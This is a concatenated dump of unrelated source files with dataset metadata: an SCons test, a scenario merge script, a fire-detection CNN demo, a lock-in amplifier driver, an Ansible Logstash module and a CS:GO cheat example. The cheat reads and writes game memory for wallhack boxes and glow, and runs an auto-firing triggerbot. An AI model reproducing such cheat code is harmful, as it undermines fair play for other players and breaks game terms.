print x,
print
print env.subst('$shared')
# Test subst_path() because it's used in $CPPDEFINES expansions.
print env.subst_path('$shared')
Default(env.Alias('dummy', None))
""")
test.run()
check(['all', '1', 'gl ical qt x11', 'gl ical qt x11',
"['gl ical qt x11']"])
expect = "shared = 'all'"+os.linesep+"listvariable = 'all'"+os.linesep
test.must_match(test.workpath('scons.variables'), expect)
check(['all', '1', 'gl ical qt x11', 'gl ical qt x11',
"['gl ical qt x11']"])
test.run(arguments='shared=none')
check(['none', '0', '', '', "['']"])
test.run(arguments='shared=')
check(['none', '0', '', '', "['']"])
test.run(arguments='shared=x11,ical')
check(['ical,x11', '1', 'ical x11', 'ical x11',
"['ical x11']"])
test.run(arguments='shared=x11,,ical,,')
check(['ical,x11', '1', 'ical x11', 'ical x11',
"['ical x11']"])
test.run(arguments='shared=GL')
check(['gl', '0', 'gl', 'gl'])
test.run(arguments='shared=QT,GL')
check(['gl,qt', '0', 'gl qt', 'gl qt', "['gl qt']"])
expect_stderr = """
scons: *** Error converting option: shared
Invalid value(s) for option: foo
""" + test.python_file_line(SConstruct_path, 19)
test.run(arguments='shared=foo', stderr=expect_stderr, status=2)
# be paranoid in testing some more combinations
expect_stderr = """
scons: *** Error converting option: shared
Invalid value(s) for option: foo
""" + test.python_file_line(SConstruct_path, 19)
test.run(arguments='shared=foo,ical', stderr=expect_stderr, status=2)
expect_stderr = """
scons: *** Error converting option: shared
Invalid value(s) for option: foo
""" + test.python_file_line(SConstruct_path, 19)
test.run(arguments='shared=ical,foo', stderr=expect_stderr, status=2)
expect_stderr = """
scons: *** Error converting option: shared
Invalid value(s) for option: foo
""" + test.python_file_line(SConstruct_path, 19)
test.run(arguments='shared=ical,foo,x11', stderr=expect_stderr, status=2)
expect_stderr = """
scons: *** Error converting option: shared
Invalid value(s) for option: foo,bar
""" + test.python_file_line(SConstruct_path, 19)
test.run(arguments='shared=foo,x11,,,bar', stderr=expect_stderr, status=2)
test.write('SConstruct', """
from SCons.Variables import ListVariable
opts = Variables(args=ARGUMENTS)
opts.AddVariables(
ListVariable('gpib',
'comment',
['ENET', 'GPIB'],
names = ['ENET', 'GPIB', 'LINUX_GPIB', 'NO_GPIB']),
)
env = Environment(variables=opts)
Help(opts.GenerateHelpText(env))
print env['gpib']
Default(env.Alias('dummy', None))
""")
test.run(stdout=test.wrap_stdout(read_str="ENET,GPIB\n", build_str="""\
scons: Nothing to be done for `dummy'.
"""))
test.pass_test()
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
| 27.93956
| 104
| 0.688496
|
c0a4e1100a7e501be3cf79926dd8ec1c9b4b321d
| 851
|
py
|
Python
|
Tools/Scenarios/merge.py
|
ErQing/Nova
|
f33ffa519a0a3115e77a1a2317001858ccde8956
|
[
"MIT"
] | 212
|
2020-11-04T19:31:15.000Z
|
2022-03-30T14:44:32.000Z
|
Tools/Scenarios/merge.py
|
ErQing/Nova
|
f33ffa519a0a3115e77a1a2317001858ccde8956
|
[
"MIT"
] | 6
|
2021-05-26T01:02:26.000Z
|
2022-01-28T11:04:53.000Z
|
Tools/Scenarios/merge.py
|
ErQing/Nova
|
f33ffa519a0a3115e77a1a2317001858ccde8956
|
[
"MIT"
] | 28
|
2020-11-05T03:05:01.000Z
|
2022-03-03T03:30:30.000Z
|
#!/usr/bin/env python3
import os
in_dir = '../../Assets/Resources/Scenarios/'
template_filename = 'template.txt'
out_filename = 'scenario.txt'
with open(template_filename, 'r', encoding='utf-8') as f_template:
with open(out_filename, 'w', encoding='utf-8', newline='\n') as f_out:
for line in f_template:
if line.startswith('@include'):
include_filename = os.path.join(in_dir,
line.strip().split()[1])
if not os.path.exists(include_filename):
print('File not found:', include_filename)
continue
with open(include_filename, 'r',
encoding='utf-8') as f_include:
f_out.write(f_include.read())
else:
f_out.write(line)
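# Illustrative note (not part of the original script): template.txt is copied line by
# line, except that a line of the form
#   @include some_scenario.txt
# is replaced by the contents of Assets/Resources/Scenarios/some_scenario.txt.
# The name "some_scenario.txt" is a made-up placeholder.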
| 37
| 74
| 0.534665
|
9d540fcf3ffd47391a70cffc9d5875aeef46f4ba
| 9,631
|
py
|
Python
|
inceptionV1-OnFire.py
|
xiaoluo999/fire-detection-cnn
|
e0d45f78af970be1cb8f935b10f87d2590e01913
|
[
"MIT"
] | null | null | null |
inceptionV1-OnFire.py
|
xiaoluo999/fire-detection-cnn
|
e0d45f78af970be1cb8f935b10f87d2590e01913
|
[
"MIT"
] | null | null | null |
inceptionV1-OnFire.py
|
xiaoluo999/fire-detection-cnn
|
e0d45f78af970be1cb8f935b10f87d2590e01913
|
[
"MIT"
] | null | null | null |
################################################################################
# Example : perform live fire detection in video using InceptionV1-OnFire CNN
# Copyright (c) 2017/18 - Andrew Dunnings / Toby Breckon, Durham University, UK
# License : https://github.com/tobybreckon/fire-detection-cnn/blob/master/LICENSE
################################################################################
import cv2
import os
import sys
import math
import glob
import numpy as np
################################################################################
import tflearn
from tflearn.layers.core import input_data, dropout, fully_connected
from tflearn.layers.conv import conv_2d, max_pool_2d, avg_pool_2d
from tflearn.layers.normalization import local_response_normalization
from tflearn.layers.merge_ops import merge
from tflearn.layers.estimator import regression
################################################################################
def construct_inceptionv1onfire (x,y):
# Build network as per architecture in [Dunnings/Breckon, 2018]
network = input_data(shape=[None, y, x, 3])
conv1_7_7 = conv_2d(network, 64, 5, strides=2, activation='relu', name = 'conv1_7_7_s2')
pool1_3_3 = max_pool_2d(conv1_7_7, 3,strides=2)
pool1_3_3 = local_response_normalization(pool1_3_3)
conv2_3_3_reduce = conv_2d(pool1_3_3, 64,1, activation='relu',name = 'conv2_3_3_reduce')
conv2_3_3 = conv_2d(conv2_3_3_reduce, 128,3, activation='relu', name='conv2_3_3')
conv2_3_3 = local_response_normalization(conv2_3_3)
pool2_3_3 = max_pool_2d(conv2_3_3, kernel_size=3, strides=2, name='pool2_3_3_s2')
inception_3a_1_1 = conv_2d(pool2_3_3, 64, 1, activation='relu', name='inception_3a_1_1')
inception_3a_3_3_reduce = conv_2d(pool2_3_3, 96,1, activation='relu', name='inception_3a_3_3_reduce')
inception_3a_3_3 = conv_2d(inception_3a_3_3_reduce, 128,filter_size=3, activation='relu', name = 'inception_3a_3_3')
inception_3a_5_5_reduce = conv_2d(pool2_3_3,16, filter_size=1,activation='relu', name ='inception_3a_5_5_reduce' )
inception_3a_5_5 = conv_2d(inception_3a_5_5_reduce, 32, filter_size=5, activation='relu', name= 'inception_3a_5_5')
inception_3a_pool = max_pool_2d(pool2_3_3, kernel_size=3, strides=1, )
inception_3a_pool_1_1 = conv_2d(inception_3a_pool, 32, filter_size=1, activation='relu', name='inception_3a_pool_1_1')
# merge the inception_3a__
inception_3a_output = merge([inception_3a_1_1, inception_3a_3_3, inception_3a_5_5, inception_3a_pool_1_1], mode='concat', axis=3)
inception_3b_1_1 = conv_2d(inception_3a_output, 128,filter_size=1,activation='relu', name= 'inception_3b_1_1' )
inception_3b_3_3_reduce = conv_2d(inception_3a_output, 128, filter_size=1, activation='relu', name='inception_3b_3_3_reduce')
inception_3b_3_3 = conv_2d(inception_3b_3_3_reduce, 192, filter_size=3, activation='relu',name='inception_3b_3_3')
inception_3b_5_5_reduce = conv_2d(inception_3a_output, 32, filter_size=1, activation='relu', name = 'inception_3b_5_5_reduce')
inception_3b_5_5 = conv_2d(inception_3b_5_5_reduce, 96, filter_size=5, name = 'inception_3b_5_5')
inception_3b_pool = max_pool_2d(inception_3a_output, kernel_size=3, strides=1, name='inception_3b_pool')
inception_3b_pool_1_1 = conv_2d(inception_3b_pool, 64, filter_size=1,activation='relu', name='inception_3b_pool_1_1')
#merge the inception_3b_*
inception_3b_output = merge([inception_3b_1_1, inception_3b_3_3, inception_3b_5_5, inception_3b_pool_1_1], mode='concat',axis=3,name='inception_3b_output')
pool3_3_3 = max_pool_2d(inception_3b_output, kernel_size=3, strides=2, name='pool3_3_3')
inception_4a_1_1 = conv_2d(pool3_3_3, 192, filter_size=1, activation='relu', name='inception_4a_1_1')
inception_4a_3_3_reduce = conv_2d(pool3_3_3, 96, filter_size=1, activation='relu', name='inception_4a_3_3_reduce')
inception_4a_3_3 = conv_2d(inception_4a_3_3_reduce, 208, filter_size=3, activation='relu', name='inception_4a_3_3')
inception_4a_5_5_reduce = conv_2d(pool3_3_3, 16, filter_size=1, activation='relu', name='inception_4a_5_5_reduce')
inception_4a_5_5 = conv_2d(inception_4a_5_5_reduce, 48, filter_size=5, activation='relu', name='inception_4a_5_5')
inception_4a_pool = max_pool_2d(pool3_3_3, kernel_size=3, strides=1, name='inception_4a_pool')
inception_4a_pool_1_1 = conv_2d(inception_4a_pool, 64, filter_size=1, activation='relu', name='inception_4a_pool_1_1')
inception_4a_output = merge([inception_4a_1_1, inception_4a_3_3, inception_4a_5_5, inception_4a_pool_1_1], mode='concat', axis=3, name='inception_4a_output')
pool5_7_7 = avg_pool_2d(inception_4a_output, kernel_size=5, strides=1)
pool5_7_7 = dropout(pool5_7_7, 0.4)
loss = fully_connected(pool5_7_7, 2,activation='softmax')
network = regression(loss, optimizer='momentum',
loss='categorical_crossentropy',
learning_rate=0.001)
model = tflearn.DNN(network, checkpoint_path='inceptiononv1onfire',
max_checkpoints=1, tensorboard_verbose=2)
return model
def cv_imread(file_path):
cv_img=cv2.imdecode(np.fromfile(file_path,dtype=np.uint8),-1)
return cv_img
################################################################################
# construct and display model
model = construct_inceptionv1onfire (224, 224)
print("Constructed InceptionV1-OnFire ...")
model.load(os.path.join("models/InceptionV1-OnFire", "inceptiononv1onfire"),weights_only=True)
print("Loaded CNN network weights ...")
################################################################################
# network input sizes
rows = 224
cols = 224
# display and loop settings
windowName = "Live Fire Detection - InceptionV1-OnFire";
keepProcessing = True;
################################################################################
if False:
# load video file from first command line argument
video = cv2.VideoCapture("./models/test.mp4")
print("Loaded video ...")
# create window
cv2.namedWindow(windowName, cv2.WINDOW_NORMAL);
# get video properties
width = int(video.get(cv2.CAP_PROP_FRAME_WIDTH));
height = int(video.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = video.get(cv2.CAP_PROP_FPS)
frame_time = round(1000/fps);
while (keepProcessing):
# start a timer (to see how long processing and display takes)
start_t = cv2.getTickCount();
# get video frame from file, handle end of file
ret, frame = video.read()
if not ret:
print("... end of video file reached");
break;
# re-size image to network input size and perform prediction
        small_frame = cv2.resize(frame, (rows, cols), interpolation=cv2.INTER_AREA)
output = model.predict([small_frame])
# label image based on prediction
if round(output[0][0]) == 1:
cv2.rectangle(frame, (0,0), (width,height), (0,0,255), 50)
cv2.putText(frame,'FIRE',(int(width/16),int(height/4)),
cv2.FONT_HERSHEY_SIMPLEX, 4,(255,255,255),10,cv2.LINE_AA);
else:
cv2.rectangle(frame, (0,0), (width,height), (0,255,0), 50)
cv2.putText(frame,'CLEAR',(int(width/16),int(height/4)),
cv2.FONT_HERSHEY_SIMPLEX, 4,(255,255,255),10,cv2.LINE_AA);
# stop the timer and convert to ms. (to see how long processing and display takes)
stop_t = ((cv2.getTickCount() - start_t)/cv2.getTickFrequency()) * 1000;
# image display and key handling
cv2.imshow(windowName, frame);
# wait fps time or less depending on processing time taken (e.g. 1000ms / 25 fps = 40 ms)
key = cv2.waitKey(max(2, frame_time - int(math.ceil(stop_t)))) & 0xFF;
if (key == ord('x')):
keepProcessing = False;
elif (key == ord('f')):
cv2.setWindowProperty(windowName, cv2.WND_PROP_FULLSCREEN, cv2.WINDOW_FULLSCREEN);
else:
path_list = glob.glob(os.path.join(r"F:\data\fire\工厂实景图片\工厂实景图片\华达油墨图片","*.jpg"))
for path in path_list:
print("Loaded images ...")
# create window
cv2.namedWindow(windowName, cv2.WINDOW_NORMAL);
# get video properties
img = cv_imread(path)
width = img.shape[1]
height = img.shape[0]
# start a timer (to see how long processing and display takes)
start_t = cv2.getTickCount();
# re-size image to network input size and perform prediction
        small_frame = cv2.resize(img, (rows, cols), interpolation=cv2.INTER_AREA)
output = model.predict([small_frame])
# label image based on prediction
if round(output[0][0]) == 1:
cv2.rectangle(img, (0, 0), (width, height), (0, 0, 255), 50)
cv2.putText(img, 'FIRE', (int(width / 16), int(height / 4)),
cv2.FONT_HERSHEY_SIMPLEX, 4, (255, 255, 255), 10, cv2.LINE_AA);
else:
cv2.rectangle(img, (0, 0), (width, height), (0, 255, 0), 50)
cv2.putText(img, 'CLEAR', (int(width / 16), int(height / 4)),
cv2.FONT_HERSHEY_SIMPLEX, 4, (255, 255, 255), 10, cv2.LINE_AA);
# stop the timer and convert to ms. (to see how long processing and display takes)
stop_t = ((cv2.getTickCount() - start_t) / cv2.getTickFrequency()) * 1000;
print("%d ms"%stop_t)
# image display and key handling
cv2.imshow(windowName, img);
cv2.waitKey(0)
################################################################################
| 43.977169
| 161
| 0.649569
|
6f7c6dd24f07d836bfcc4727c3766c7afe0bfdcb
| 286
|
py
|
Python
|
python/ordering_common/ordering_psi4.py
|
colleeneb/simint-generator
|
48125f29612c4a78a2d1493f717d82e4af095c59
|
[
"BSD-3-Clause"
] | 20
|
2017-07-04T16:10:22.000Z
|
2021-04-19T20:48:44.000Z
|
python/ordering_common/ordering_psi4.py
|
colleeneb/simint-generator
|
48125f29612c4a78a2d1493f717d82e4af095c59
|
[
"BSD-3-Clause"
] | 9
|
2017-03-22T07:57:38.000Z
|
2018-12-11T18:48:55.000Z
|
python/ordering_common/ordering_psi4.py
|
colleeneb/simint-generator
|
48125f29612c4a78a2d1493f717d82e4af095c59
|
[
"BSD-3-Clause"
] | 8
|
2017-10-23T23:16:28.000Z
|
2021-12-13T17:18:11.000Z
|
from .gaussian import Gaussian
def IteratePsi4(g):
newg = Gaussian(g.am)
if g.ijk[2] == g.am:
newg.ijk = [-1, -1, -1]
elif g.ijk[2] < (g.am - g.ijk[0]):
newg.ijk = [g.ijk[0], g.ijk[1]-1, g.ijk[2]+1]
else:
newg.ijk = [g.ijk[0]-1, g.am-g.ijk[0]+1, 0]
return newg
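# Illustrative sketch (not part of the original module): walking a whole shell with
# IteratePsi4. It assumes Gaussian(am) accepts the angular momentum alone, as in the
# call above; the starting component [am, 0, 0] is set explicitly rather than relying
# on the constructor.
def _example_shell_order(am=2):
    g = Gaussian(am)
    g.ijk = [am, 0, 0]
    order = []
    while g.ijk != [-1, -1, -1]:
        order.append(tuple(g.ijk))
        g = IteratePsi4(g)
    # am=2 -> [(2,0,0), (1,1,0), (1,0,1), (0,2,0), (0,1,1), (0,0,2)]
    return order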
| 20.428571
| 49
| 0.538462
|
9e0f1f920377e87997892102de21c8ba512bfb3f
| 5,427
|
py
|
Python
|
drivers/lockInAmp/sr830.py
|
mv20100/phd_code
|
2262c71c7c35aed5759c4b0e058fe74c44e5266b
|
[
"MIT"
] | null | null | null |
drivers/lockInAmp/sr830.py
|
mv20100/phd_code
|
2262c71c7c35aed5759c4b0e058fe74c44e5266b
|
[
"MIT"
] | null | null | null |
drivers/lockInAmp/sr830.py
|
mv20100/phd_code
|
2262c71c7c35aed5759c4b0e058fe74c44e5266b
|
[
"MIT"
] | null | null | null |
import visa
import time
import numpy as np
sensitivities = [2e-9,5e-9,1e-8,2e-8,5e-8,1e-7,2e-7,5e-7,1e-6,2e-6,5e-6,
1e-5,2e-5,5e-5,1e-4,2e-4,5e-4,1e-3,2e-3,5e-3,1e-2,2e-2,5e-2,
1e-1,2e-1,5e-1,1] # in volt
timeConstants = [1e-5,3e-5,1e-4,3e-4,1e-3,3e-3,1e-2,3e-2,0.1,0.3,1,3,10,30,1e2,3e2,1e3,3e3,1e4,3e4] # in second
sampleRates = [62.5e-3,125e-3,250e-3,500e-3,1,2,4,8,16,32,64,128,256,512,"Trigger"]
lowPassFiltSlopes = [6,12,18,24] # in dB/oct
inputConfigs = ["A","A-B","I (1 Mohm)","I (100 Mohm)"]
inputShieldGrounds = ["Float","Ground"]
inputCouplings = ["AC","DC"]
lineNotchFilters = ["Out","Line In","2xLine In","Both In"]
locRemStates = ["LOCAL","REMOTE","LOCAL LOCKOUT"]
class SR830(object):
def __init__(self,gpibAdress=8,name=None):
gpibID = "GPIB::"+str(gpibAdress)+"::INSTR"
rm = visa.ResourceManager()
self.inst = rm.open_resource(gpibID,read_termination='\n')
self.name = name
self.overide_rem_state = 0
self.loc_rem_state = 1
def send(self,command):
self.inst.write(command)
def query(self,command):
self.send(command)
return self.inst.read()
#REFERENCE
@property
def amplitude(self):
return float(self.query("SLVL?"))
@amplitude.setter
def amplitude(self,amplitude):
self.send("SLVL "+str(amplitude))
@property
def phase(self):
return float(self.query("PHAS?"))
@phase.setter
def phase(self,phase):
self.send("PHAS "+str(phase))
@property
def ref_freq(self):
return float(self.query("FREQ?"))
@ref_freq.setter
def ref_freq(self,freq):
self.send("FREQ "+str(freq))
def getOutputX(self,iterations=1,timeit=False):
value = 0.
startT = time.time()
for i in range(iterations):
self.inst.write("OUTP?1")
value = value + float(self.inst.read())
if timeit: print "Duration: "+str(time.time()-startT)
value = value/iterations
return value
def getOutputX2(self,sampleRateIdx=8,timeit=False,samples=25):
startT = time.time()
self.inst.write("SRAT "+str(int(sampleRateIdx))+";SEND 0")
self.inst.write("REST;STRT")
        while self.sample_points < samples:
time.sleep(0.01)
self.inst.write("PAUS")
self.inst.write("TRCA?1,0,"+str(int(samples)))
buffer = self.inst.read()
if timeit: print "Duration: "+str(time.time()-startT)
return np.mean(np.array(buffer.split(',')[:-1],dtype=np.float))
#INPUT and FILTER
@property
def input_config(self):
inputConfigIdx = int(self.query("ISRC?"))
return inputConfigs[inputConfigIdx]
@input_config.setter
def input_config(self,inputConfig):
self.send("ISRC "+str(inputConfig))
@property
def input_shield_ground(self):
inputShieldGroundIdx = int(self.query("IGND?"))
return inputShieldGrounds[inputShieldGroundIdx]
@input_shield_ground.setter
def input_shield_ground(self,inputShieldGround):
self.send("IGND "+str(inputShieldGround))
@property
def input_coupling(self):
inputCouplingIdx = int(self.query("ICPL?"))
return inputCouplings[inputCouplingIdx]
@input_coupling.setter
def input_coupling(self,inputCoupling):
self.send("ICPL "+str(inputCoupling))
@property
def line_notch_filter(self):
lineNotchFilterIdx = int(self.query("ILIN?"))
return lineNotchFilters[lineNotchFilterIdx]
@line_notch_filter.setter
def line_notch_filter(self,lineNotchFilter):
self.send("ILIN "+str(lineNotchFilter))
#GAIN and TIME CONSTANT
@property
def sensitivity(self):
sensitivityIdx = int(self.query("SENS?"))
return sensitivities[sensitivityIdx]
@sensitivity.setter
def sensitivity(self,sensitivity):
self.send("SENS "+str(sensitivity))
@property
def time_constant(self):
timeConstantIdx = int(self.query("OFLT?"))
return timeConstants[timeConstantIdx]
@time_constant.setter
def time_constant(self,timeConstant):
self.send("OFLT "+str(timeConstant))
@property
def lowpass_filter_slope(self):
lowPassFiltSlopeIdx = int(self.query("OFSL?"))
return lowPassFiltSlopes[lowPassFiltSlopeIdx]
@lowpass_filter_slope.setter
def lowpass_filter_slope(self,lowPassFiltSlope):
self.send("OFSL "+str(lowPassFiltSlope))
# DATA TRANSFER COMMANDS
@property
def sample_points(self):
return int(self.query("SPTS?"))
# INTERFACE
@property
def loc_rem_state(self):
locRemStateIdx = int(self.query("LOCL?"))
return locRemStates[locRemStateIdx]
@loc_rem_state.setter
def loc_rem_state(self,locRemState):
self.send("LOCL "+str(locRemState))
@property
def overide_rem_state(self):
return int(self.query("OVRM?"))
@overide_rem_state.setter
def overide_rem_state(self,overideRemState):
self.send("OVRM "+str(int(overideRemState)))
def getParams(self):
params = dict()
params.update({"lowPassFiltSlope":self.getLowPassFiltSlope()})
params.update({"timeConstant":self.getTimeConstant()})
params.update({"sensitivity":self.getSensitivity()})
params.update({"lineNotchFilter":self.getLineNotchFilter()})
params.update({"inputCoupling":self.getInputCoupling()})
params.update({"inputShieldGround":self.getInputShieldGround()})
params.update({"inputConfig":self.getInputConfig()})
params.update({"refFreq":self.getRefFreq()})
params.update({"amplitude":self.getAmplitude()})
params.update({"phase":self.getPhase()})
return {self.name:params}
if __name__=='__main__':
lockIn = SR830()
| 29.335135
| 112
| 0.696149
|
748c875f667303df7dc99fcda1857333081b1eb1
| 5,251
|
py
|
Python
|
ansible/modules/monitoring/logstash_plugin.py
|
EnjoyLifeFund/py36pkgs
|
0ac677fbbfa7b6d8c527fe2c759ba05117b07fd2
|
[
"MIT",
"BSD-2-Clause",
"BSD-3-Clause"
] | null | null | null |
ansible/modules/monitoring/logstash_plugin.py
|
EnjoyLifeFund/py36pkgs
|
0ac677fbbfa7b6d8c527fe2c759ba05117b07fd2
|
[
"MIT",
"BSD-2-Clause",
"BSD-3-Clause"
] | null | null | null |
ansible/modules/monitoring/logstash_plugin.py
|
EnjoyLifeFund/py36pkgs
|
0ac677fbbfa7b6d8c527fe2c759ba05117b07fd2
|
[
"MIT",
"BSD-2-Clause",
"BSD-3-Clause"
] | 1
|
2020-02-13T14:24:57.000Z
|
2020-02-13T14:24:57.000Z
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
Ansible module to manage elasticsearch plugins
(c) 2017, Loic Blot <loic.blot@unix-experience.fr>
This file is part of Ansible
Ansible is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
Ansible is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with Ansible. If not, see <http://www.gnu.org/licenses/>.
"""
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: logstash_plugin
short_description: Manage Logstash plugins
description:
- Manages Logstash plugins.
version_added: "2.3"
author: Loic Blot (@nerzhul)
options:
name:
description:
- Install plugin with that name.
required: True
state:
description:
- Apply plugin state.
required: False
choices: ["present", "absent"]
default: present
plugin_bin:
description:
- Specify logstash-plugin to use for plugin management.
required: False
default: /usr/share/logstash/bin/logstash-plugin
proxy_host:
description:
- Proxy host to use during plugin installation.
required: False
default: None
proxy_port:
description:
- Proxy port to use during plugin installation.
required: False
default: None
version:
description:
      - Version of the plugin to install.
        If the plugin already exists with a previous version, it will NOT be updated.
required: False
default: None
'''
EXAMPLES = '''
- name: Install Logstash beats input plugin
logstash_plugin:
state: present
name: logstash-input-beats
- name: Install specific version of a plugin
logstash_plugin:
state: present
name: logstash-input-syslog
version: '3.2.0'
- name: Uninstall Logstash plugin
logstash_plugin:
state: absent
name: logstash-filter-multiline
'''
PACKAGE_STATE_MAP = dict(
present="install",
absent="remove"
)
from ansible.module_utils.basic import AnsibleModule
def is_plugin_present(module, plugin_bin, plugin_name):
cmd_args = [plugin_bin, "list", plugin_name]
rc, out, err = module.run_command(" ".join(cmd_args))
return rc == 0
def parse_error(string):
reason = "reason: "
try:
return string[string.index(reason) + len(reason):].strip()
except ValueError:
return string
def install_plugin(module, plugin_bin, plugin_name, version, proxy_host, proxy_port):
cmd_args = [plugin_bin, PACKAGE_STATE_MAP["present"], plugin_name]
if version:
cmd_args.append("--version %s" % version)
if proxy_host and proxy_port:
cmd_args.append("-DproxyHost=%s -DproxyPort=%s" % (proxy_host, proxy_port))
cmd = " ".join(cmd_args)
if module.check_mode:
rc, out, err = 0, "check mode", ""
else:
rc, out, err = module.run_command(cmd)
if rc != 0:
reason = parse_error(out)
module.fail_json(msg=reason)
return True, cmd, out, err
def remove_plugin(module, plugin_bin, plugin_name):
cmd_args = [plugin_bin, PACKAGE_STATE_MAP["absent"], plugin_name]
cmd = " ".join(cmd_args)
if module.check_mode:
rc, out, err = 0, "check mode", ""
else:
rc, out, err = module.run_command(cmd)
if rc != 0:
reason = parse_error(out)
module.fail_json(msg=reason)
return True, cmd, out, err
def main():
module = AnsibleModule(
argument_spec=dict(
name=dict(required=True),
state=dict(default="present", choices=PACKAGE_STATE_MAP.keys()),
plugin_bin=dict(default="/usr/share/logstash/bin/logstash-plugin", type="path"),
proxy_host=dict(default=None),
proxy_port=dict(default=None),
version=dict(default=None)
),
supports_check_mode=True
)
name = module.params["name"]
state = module.params["state"]
plugin_bin = module.params["plugin_bin"]
proxy_host = module.params["proxy_host"]
proxy_port = module.params["proxy_port"]
version = module.params["version"]
present = is_plugin_present(module, plugin_bin, name)
# skip if the state is correct
if (present and state == "present") or (state == "absent" and not present):
module.exit_json(changed=False, name=name, state=state)
if state == "present":
changed, cmd, out, err = install_plugin(module, plugin_bin, name, version, proxy_host, proxy_port)
elif state == "absent":
changed, cmd, out, err = remove_plugin(module, plugin_bin, name)
module.exit_json(changed=changed, cmd=cmd, name=name, state=state, stdout=out, stderr=err)
if __name__ == '__main__':
main()
| 28.538043
| 106
| 0.655113
|
3c0b2874c8ec9c138eb2bfa36d6845104f7a73f1
| 5,730
|
py
|
Python
|
examples/csgo_esp.py
|
zenxs/PyMeow
|
a7596cb3057225761d2be9aaff69000894b822a0
|
[
"MIT"
] | 2
|
2021-09-01T11:39:52.000Z
|
2022-01-02T13:35:54.000Z
|
examples/csgo_esp.py
|
zenxs/PyMeow
|
a7596cb3057225761d2be9aaff69000894b822a0
|
[
"MIT"
] | null | null | null |
examples/csgo_esp.py
|
zenxs/PyMeow
|
a7596cb3057225761d2be9aaff69000894b822a0
|
[
"MIT"
] | null | null | null |
import sys
from pymeow import *
from requests import get
class Offsets:
pass
class Colors:
white = rgb("white")
black = rgb("black")
blue = rgb("blue")
red = rgb("red")
cyan = rgb("cyan")
orange = rgb("orange")
silver = rgb("silver")
class Entity:
def __init__(self, addr, mem, gmod):
self.wts = None
self.addr = addr
self.mem = mem
self.gmod = gmod
self.id = read_int(self.mem, self.addr + 0x64)
self.health = read_int(self.mem, self.addr + Offsets.m_iHealth)
self.dormant = read_int(self.mem, self.addr + Offsets.m_bDormant)
self.team = read_int(self.mem, self.addr + Offsets.m_iTeamNum)
self.bone_base = read_int(self.mem, self.addr + Offsets.m_dwBoneMatrix)
self.pos = read_vec3(self.mem, self.addr + Offsets.m_vecOrigin)
@property
def name(self):
radar_base = read_int(self.mem, self.gmod + Offsets.dwRadarBase)
hud_radar = read_int(self.mem, radar_base + 0x78)
return read_string(self.mem, hud_radar + 0x300 + (0x174 * (self.id - 1)))
def bone_pos(self, bone_id):
return vec3(
read_float(self.mem, self.bone_base + 0x30 * bone_id + 0x0C),
read_float(self.mem, self.bone_base + 0x30 * bone_id + 0x1C),
read_float(self.mem, self.bone_base + 0x30 * bone_id + 0x2C),
)
def glow(self):
"""
Should be used in a thread.
"""
glow_addr = (
read_int(self.mem, self.gmod + Offsets.dwGlowObjectManager)
+ read_int(self.mem, self.addr + Offsets.m_iGlowIndex) * 0x38
)
color = Colors.cyan if self.team != 2 else Colors.orange
write_floats(self.mem, glow_addr + 4, color + [1.5])
write_bytes(self.mem, glow_addr + 0x24, [1, 0])
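            # Illustrative only (threading is not imported in this file): the
            # docstring above suggests running this per entity in a thread,
            # e.g. threading.Thread(target=ent.glow, daemon=True).start()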
def trigger_bot(mem, local, ent):
cross = read_int(mem, local.addr + Offsets.m_iCrosshairId)
if cross == ent.id and ent.team != local.team:
mouse_click()
def main():
try:
# Credits to https://github.com/frk1/hazedumper
haze = get("https://raw.githubusercontent.com/frk1/hazedumper/master/csgo.json").json()
[setattr(Offsets, k, v) for k, v in haze["signatures"].items()]
[setattr(Offsets, k, v) for k, v in haze["netvars"].items()]
except:
sys.exit("Unable to fetch Hazedumper's Offsets")
csgo_proc = process_by_name("csgo.exe")
game_module = csgo_proc["modules"]["client.dll"]["baseaddr"]
overlay = overlay_init() # Windowed Fullscreen
font = font_init(10, "Tahoma")
set_foreground("Counter-Strike: Global Offensive")
while overlay_loop(overlay):
try:
local_player_addr = read_int(csgo_proc, game_module + Offsets.dwLocalPlayer)
local_ent = Entity(local_player_addr, csgo_proc, game_module)
except:
# No local player
continue
if local_player_addr:
ent_addrs = read_ints(csgo_proc, game_module + Offsets.dwEntityList, 128)[0::4]
view_matrix = read_floats(csgo_proc, game_module + Offsets.dwViewMatrix, 16)
for ent_addr in ent_addrs:
if ent_addr > 0 and ent_addr != local_player_addr:
ent = Entity(ent_addr, csgo_proc, game_module)
if not ent.dormant and ent.health > 0:
try:
ent.wts = wts_dx(overlay, view_matrix, ent.pos)
# ent.glow()
head_pos = wts_dx(overlay, view_matrix, ent.bone_pos(8))
head = head_pos["y"] - ent.wts["y"]
width = head / 2
center = width / -2
corner_box(
ent.wts["x"] + center,
ent.wts["y"],
width,
head + 5,
Colors.cyan if ent.team != 2 else Colors.red,
Colors.black,
0.15,
)
value_bar(
ent.wts["x"] + center - 5,
ent.wts["y"],
ent.wts["x"] + center - 5,
head_pos["y"] + 5,
2,
100, ent.health
)
font_print(
font,
ent.wts["x"] - len(ent.name) * 1.5,
ent.wts["y"] - 10,
ent.name,
Colors.white,
)
font_print(
font,
ent.wts["x"] - 2,
ent.wts["y"] - 20,
str(int(vec3_distance(ent.pos, local_ent.pos) / 20)),
Colors.white,
)
dashed_line(
overlay["midX"],
overlay["midY"],
ent.wts["x"],
ent.wts["y"],
1,
Colors.silver,
)
trigger_bot(csgo_proc, local_ent, ent)
except:
pass
overlay_deinit(overlay)
if __name__ == "__main__":
main()
| 37.207792
| 95
| 0.460908
|
35e47f6bd27c29eb96181326b9c40866dc06a3f4
| 743
|
py
|
Python
|
py_wolfram/wapex3.py
|
JMaio/Askii
|
7cc611b470226a7983f85b4788df5884fa5140ed
|
[
"Apache-2.0"
] | null | null | null |
py_wolfram/wapex3.py
|
JMaio/Askii
|
7cc611b470226a7983f85b4788df5884fa5140ed
|
[
"Apache-2.0"
] | null | null | null |
py_wolfram/wapex3.py
|
JMaio/Askii
|
